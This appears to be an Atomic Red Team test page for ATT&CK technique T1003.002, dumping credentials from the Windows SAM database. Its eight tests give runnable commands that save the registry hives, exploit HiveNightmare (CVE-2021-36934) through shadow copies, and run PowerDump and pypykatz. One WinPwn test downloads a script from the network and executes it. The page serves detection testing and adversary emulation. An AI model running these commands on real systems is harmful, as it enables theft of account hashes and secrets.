T1003.002 - OS Credential Dumping: Security Account Manager

Description from ATT&CK

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, the SAM can be extracted from the Registry with Reg: * reg save HKLM\sam sam * reg save HKLM\system system Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7) Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,000+.

Atomic Tests


Atomic Test #1 - Registry dump of SAM, creds, and secrets

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

Supported Platforms: Windows

auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

Cleanup Commands:

del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul



Atomic Test #2 - Registry parse with pypykatz

Parses registry hives to obtain stored credentials.

Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.

Supported Platforms: Windows

auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002|

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

"#{venv_path}\Scripts\pypykatz" live lsa

Dependencies: Run with
1
powershell
!

Description: Computer must have python 3 installed
Check Prereq Commands:
1
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
Description: Computer must have venv configured at #{venv_path}
Check Prereq Commands:
1
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
Get Prereq Commands:
1
py -m venv "#{venv_path}"
Description: pypykatz must be installed
Check Prereq Commands:
1
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null



Atomic Test #3 - esentutl.exe SAM copy

Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.

Supported Platforms: Windows

auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM| | file_name | Name of the copied file | string | SAM| | copy_dest | Destination of the copied file | string | %temp%|

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}

Cleanup Commands:

del #{copy_dest}\#{file_name} >nul 2>&1



Atomic Test #4 - PowerDump Hashes and Usernames from Registry

Executes a hashdump by reading the hashes from the registry.

Supported Platforms: Windows

auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
2
3
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump

Dependencies: Run with
1
powershell
!

Description: PowerDump script must exist on disk at specified location
Check Prereq Commands:
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"



Atomic Test #5 - dump volume shadow copy hives with certutil

Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as “HiveNightmare” or “SeriousSAM”. This can be done with a non-admin user account. CVE-2021-36934

Supported Platforms: Windows

auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | target_hive | Hive you wish to dump | string | SAM| | limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|

Attack Commands: Run with
1
command_prompt
!

for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*

Cleanup Commands:

for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)



Atomic Test #6 - dump volume shadow copy hives with System.IO.File

Dump hives from volume shadow copies with System.IO.File. CVE-2021-36934

Supported Platforms: Windows

auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | target_hive | Hive you wish to dump | string | SAM| | limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|

Attack Commands: Run with
1
powershell
!

1
2
3
4
1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}

Cleanup Commands:

1
2
3
1..#{limit} | % {
  rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}



Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb

Attack Commands: Run with
1
powershell
!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive



Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

Supported Platforms: Windows

auto_generated_guid: 21df41be-cdd8-4695-a650-c3981113aa3c

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security

Cleanup Commands:

del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul